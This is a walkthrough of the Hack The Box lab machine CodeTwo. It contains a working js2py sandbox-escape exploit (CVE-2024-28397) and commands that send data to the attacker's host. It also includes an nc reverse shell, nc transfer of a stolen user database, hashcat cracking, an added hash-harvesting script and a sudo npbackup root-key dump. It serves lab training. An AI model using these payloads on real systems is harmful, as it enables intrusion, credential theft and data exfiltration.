HTB Season 8 machine - CodeTwo
nmap scan
└─$ nmap -F 10.129.151.221 -A
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-08-18 21:30 EDT
Nmap scan report for 10.129.151.221
Host is up (0.36s latency).
Not shown: 98 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.13 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 a0:47:b4:0c:69:67:93:3a:f9:b4:5d:b3:2f:bc:9e:23 (RSA)
| 256 7d:44:3f:f1:b1:e2:bb:3d:91:d5:da:58:0f:51:e5:ad (ECDSA)
|_ 256 f1:6b:1d:36:18:06:7a:05:3f:07:57:e1:ef:86:b4:85 (ED25519)
8000/tcp open http Gunicorn 20.0.4
|_http-title: Welcome to CodeTwo
|_http-server-header: gunicorn/20.0.4
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.94SVN%E=4%D=8/18%OT=22%CT=7%CU=42024%PV=Y%DS=2%DC=T%G=Y%TM=68A3
OS:D3DA%P=x86_64-pc-linux-gnu)SEQ(SP=102%GCD=1%ISR=108%TI=Z%CI=Z%II=I%TS=A)
OS:SEQ(SP=104%GCD=1%ISR=10A%TI=Z%CI=Z%II=I%TS=A)SEQ(SP=104%GCD=2%ISR=10A%TI
OS:=Z%CI=Z%II=I%TS=A)SEQ(SP=105%GCD=1%ISR=10A%TI=Z%CI=Z%II=I%TS=A)SEQ(SP=10
OS:5%GCD=1%ISR=10B%TI=Z%CI=Z%II=I%TS=A)OPS(O1=M542ST11NW7%O2=M542ST11NW7%O3
OS:=M542NNT11NW7%O4=M542ST11NW7%O5=M542ST11NW7%O6=M542ST11)WIN(W1=FE88%W2=F
OS:E88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN(R=Y%DF=Y%T=40%W=FAF0%O=M542NNSNW
OS:7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF
OS:=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=
OS:%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=
OS:0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RI
OS:PCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE (using port 5900/tcp)
HOP RTT ADDRESS
1 419.03 ms 10.10.16.1
2 324.03 ms 10.129.151.221

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 63.26 seconds
Visiting port 8000
![![[Pasted image 20250819121518.png]]](https://i-blog.csdnimg.cn/direct/4f47f0826bb045ae97981e5a461567cb.png)
We download the app and register an account
![![[Pasted image 20250819121541.png]]](https://i-blog.csdnimg.cn/direct/23b5fdd08d424c1bb38b42e5eddeef0f.png)
Log in with the account and enter the dashboard
![![[Pasted image 20250819121623.png]]](https://i-blog.csdnimg.cn/direct/d1ee8b41b41d4fdb86e2c07dba17e7f0.png)
js2py RCE vulnerability
Analysing the APP.zip source, the code-execution endpoint passes user-supplied JavaScript to js2py.eval_js(). A Google search shows that in 2024 this function was found to allow RCE through a sandbox escape, CVE-2024-28397 (analysis: https://github.com/Marven11/CVE-2024-28397-js2py-Sandbox-Escape/blob/main/analysis_zh.md).
After working through the vulnerable code, we build the following payload as a PoC. The JS reaches a real Python object, walks object.__subclasses__() until it finds subprocess.Popen, and calls it with shell=True; a request for /pwned in the Kali http.server log confirms the command ran:
######## kali shell ########
python -m http.server 80
############################

let cmd = "wget http://10.10.16.8/pwned"
let a = Object.getOwnPropertyNames({}).__class__.__base__.__getattribute__
let obj = a(a(a,"__class__"), "__base__")
function findpopen(o) {
    let result;
    for(let i in o.__subclasses__()) {
        let item = o.__subclasses__()[i]
        if(item.__module__ == "subprocess" && item.__name__ == "Popen") {
            return item
        }
        if(item.__name__ != "type" && (result = findpopen(item))) {
            return result
        }
    }
}
let result = findpopen(obj)(cmd, -1, null, -1, -1, -1, null, null, true).communicate()
console.log(result)
result
![![[Pasted image 20250819140011.png]]](https://i-blog.csdnimg.cn/direct/c1ec0d393667469d8c9930e55104dd5c.png)
That confirms the command executed. Next we probe which tools exist on the target: modify the payload so it runs `which` over a list of useful binaries and curls the base64-encoded result (base64 -w0 keeps it on one line so it survives as a URL path) back to the Kali HTTP server:
let cmd = "curl http://10.10.16.8:80/$(which python nc bash sh ncat curl rustcat openssl perl php ruby socat node java telnet zsh lua golang vlang awk nmap aws nc ncat netcat nc.traditional wget curl ping gcc g++ make gdb base64 socat python python2 python3 python2.7 python2.6 python3.6 python3.7 perl php ruby xterm doas sudo fetch docker lxc ctr runc rkt kubectl 2>/dev/null| base64 -w0)"
let a = Object.getOwnPropertyNames({}).__class__.__base__.__getattribute__
let obj = a(a(a,"__class__"), "__base__")
function findpopen(o) {
    let result;
    for(let i in o.__subclasses__()) {
        let item = o.__subclasses__()[i]
        if(item.__module__ == "subprocess" && item.__name__ == "Popen") {
            return item
        }
        if(item.__name__ != "type" && (result = findpopen(item))) {
            return result
        }
    }
}
let result = findpopen(obj)(cmd, -1, null, -1, -1, -1, null, null, true).communicate()
console.log(result)
result
![![[Pasted image 20250819140329.png]]](https://i-blog.csdnimg.cn/direct/8bd4c35550ea48b3a6a2355c8d64a6c0.png)
Decoding the base64 gives the plaintext:
/usr/bin/nc
/usr/bin/bash
/usr/bin/sh
/usr/bin/curl
/usr/bin/openssl
/usr/bin/perl
/usr/bin/telnet
/usr/bin/awk
/usr/bin/nc
/usr/bin/netcat
/usr/bin/wget
/usr/bin/curl
/usr/bin/ping
/usr/bin/gcc
/usr/bin/g++
/usr/bin/make
/usr/bin/base64
/usr/bin/python3
/usr/bin/perl
/usr/bin/sudo
Building a reverse shell with nc
We use nc for the callback. Modify the payload:
######## kali shell ########
nc -lvnp 8888
############################

let cmd = "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1|nc 10.10.16.8 8888 >/tmp/f"
let a = Object.getOwnPropertyNames({}).__class__.__base__.__getattribute__
let obj = a(a(a,"__class__"), "__base__")
function findpopen(o) {
    let result;
    for(let i in o.__subclasses__()) {
        let item = o.__subclasses__()[i]
        if(item.__module__ == "subprocess" && item.__name__ == "Popen") {
            return item
        }
        if(item.__name__ != "type" && (result = findpopen(item))) {
            return result
        }
    }
}
let result = findpopen(obj)(cmd, -1, null, -1, -1, -1, null, null, true).communicate()
console.log(result)
result
![![[Pasted image 20250819140548.png]]](https://i-blog.csdnimg.cn/direct/f8556e36923d404fa8307605ca52e729.png)
Exfiltrating the .db database file
We find a .db file, which is a SQLite3 database:
/home/app/app/instance/user.db
Transfer the file over nc
######## kali shell ########
nc -lvnp 8888 > users.db
############################

######## target shell ########
nc -q 0 10.10.16.8 8888 < users.db
![![[Pasted image 20250819141848.png]]](https://i-blog.csdnimg.cn/direct/1bbab54e145b4aecab9e8dea564288ed.png)
Save the hash in sqlite3.hash and crack it with hashcat (-a 0 is a wordlist attack, -m 0 is raw MD5):
hashcat -a 0 -m 0 sqlite3.hash /home/kali/Desktop/Info/zhuzhuzxia/Passwords/rockyou.txt
![![[Pasted image 20250819142117.png]]](https://i-blog.csdnimg.cn/direct/ffe6cee0ec9d41f18554fe1bee6bd507.png)
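The step between pulling the database and running hashcat, getting the hashes out of the .db file and choosing the mode, is worth automating because the table and column names of a stolen database are not known up front. The following is an added example, not code from the page or from CodeTwo: it opens a SQLite file with Python's sqlite3 module, walks every table and column, keeps the cells that look like unsalted hex digests, and maps their length to the hashcat mode. The in-memory database with users alice and bob and their demo passwords is constructed here so the script runs offline; the real schema of users.db is not assumed.

```python
"""Harvest password hashes from a SQLite database of unknown schema (added example)."""
import hashlib
import re
import sqlite3
import sys

# Unsalted hex digests that hashcat tells apart by length alone: (regex, -m mode, label)
HASH_PATTERNS = (
    (re.compile(r"^[0-9a-f]{32}$"), 0, "MD5"),
    (re.compile(r"^[0-9a-f]{40}$"), 100, "SHA1"),
    (re.compile(r"^[0-9a-f]{64}$"), 1400, "SHA2-256"),
)


def classify(value):
    """Return (hashcat_mode, label) for a bare hex digest, or None if it is not one."""
    for pattern, mode, label in HASH_PATTERNS:
        if pattern.match(value.lower()):
            return mode, label
    return None


def harvest_hashes(conn):
    """Scan every user table and every column of an open connection.

    Returns [(table, column, value, mode, label)] for each text cell that
    classify() recognises, so no knowledge of the schema is needed.
    """
    found = []
    tables = [r[0] for r in conn.execute(
        "SELECT name FROM sqlite_master WHERE type='table' AND name NOT LIKE 'sqlite_%'")]
    for table in tables:
        cols = [r[1] for r in conn.execute(f'PRAGMA table_info("{table}")')]
        for row in conn.execute(f'SELECT * FROM "{table}"'):
            for col, val in zip(cols, row):
                if isinstance(val, str):
                    hit = classify(val)
                    if hit is not None:
                        found.append((table, col, val, hit[0], hit[1]))
    return found


def hashcat_file(found, mode):
    """Hashcat input: one hash per line, all of a single mode."""
    return "\n".join(v for _, _, v, m, _ in found if m == mode) + "\n"


def build_sample_db():
    """Constructed stand-in for users.db: a Flask-style `user` table holding one
    MD5 and one SHA1 password hash. Users and passwords are invented for the demo."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE user (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany("INSERT INTO user (username, password) VALUES (?, ?)", [
        ("alice", hashlib.md5(b"demo-password-1").hexdigest()),
        ("bob", hashlib.sha1(b"demo-password-2").hexdigest()),
    ])
    conn.commit()
    return conn


if __name__ == "__main__":
    # Usage: python harvest.py users.db   (no argument: run against the sample DB)
    conn = sqlite3.connect(sys.argv[1]) if len(sys.argv) > 1 else build_sample_db()
    hits = harvest_hashes(conn)
    for table, col, val, mode, label in hits:
        print(f"{table}.{col}: {val}  ->  {label} (hashcat -m {mode})")
    # Contents for sqlite3.hash when the digests are MD5, as on this box:
    print(hashcat_file(hits, 0), end="")
```

Length-based classification only works for unsalted digests; a value such as `pbkdf2:sha256:...` or a `$2b$` bcrypt string would be skipped here and needs its own hashcat mode.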
Confirm the cracked password works over SSH
![![[Pasted image 20250819142542.png]]](https://i-blog.csdnimg.cn/direct/a9dfaad12e4c4ab382d700737640027b.png)
ssh marco@10.129.151.221
![![[Pasted image 20250819143024.png]]](https://i-blog.csdnimg.cn/direct/3b1b91561bcd4cd3be5e646cf0ec6218.png)
Abusing the backup tool allowed by sudo
Check sudo -l
sudo -l
![![[Pasted image 20250819143343.png]]](https://i-blog.csdnimg.cn/direct/4cc3cd67361c4b7f83054e7a26e9979d.png)
Use npbackup to back up the root folder. First change the backup path in npbackup.conf to /root/:
![![[Pasted image 20250819154553.png]]](https://i-blog.csdnimg.cn/direct/eb635190e4c54dbf849b7d784d413fb5.png)
    repo_group: default_group
    backup_opts:
      paths:
        - /root/
      source_type: folder_list
      exclude_files_larger_than: 0.0
Then run the following to start the backup
sudo npbackup-cli -c npbackup.conf -b -f
Then run it again with --dump to retrieve root's SSH private key
sudo npbackup-cli -c npbackup.conf -f --dump /root/.ssh/id_rsa > id_rsa
Log in as root with the private key
marco@codetwo:~$ sudo npbackup-cli -c npbackup.conf -f --dump /root/.ssh/id_rsa > id_rsa
marco@codetwo:~$ chmod 600 id_rsa
marco@codetwo:~$ ssh root@localhost -i id_rsa
![![[Pasted image 20250819154831.png]]](https://i-blog.csdnimg.cn/direct/4580fb6961804a04a61120f9a77dcc21.png)
